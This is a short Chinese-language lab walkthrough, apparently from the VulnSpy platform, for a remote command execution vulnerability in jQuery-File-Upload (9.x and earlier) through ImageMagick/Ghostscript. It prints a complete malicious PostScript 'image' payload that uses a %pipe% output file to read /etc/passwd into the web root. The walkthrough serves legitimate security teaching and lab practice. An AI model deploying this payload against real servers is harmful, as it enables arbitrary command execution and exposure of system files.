jQuery-File-Upload <= 9.x 远程命令执行漏洞利用 (ImageMagick/Ghostscript)


jQuery-File-Upload 是 Github 上继 jQuery 之后最受关注的 jQuery 项目,该项目最近被披露出一个存在了长达三年之久的任意文件上传漏洞,该漏洞在随后发布的 v9.22.2 版本中被修复,但是在 VulnSpy 团队对代码的复查中发现了另外一个严重的命令执行漏洞,该漏洞允许攻击者通过上传恶意的图片文件来执行任意系统命令。

漏洞利用

1. 点击右上角的 START TO HACK 按钮创建实验环境

2. 进入实验环境

3. 直接上传恶意的图片文件

图片(vsplate.jpg)内容如下:

注:该文件将执行cat /etc/passwd > /var/www/html/vsplate.txt

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat /etc/passwd > /var/www/html/vsplate.txt) currentdevice putdeviceprops

4. 上传成功后将在网站目录下生成vsplate.txt文件

参考

All rights reserved. © 2018 VULNSPY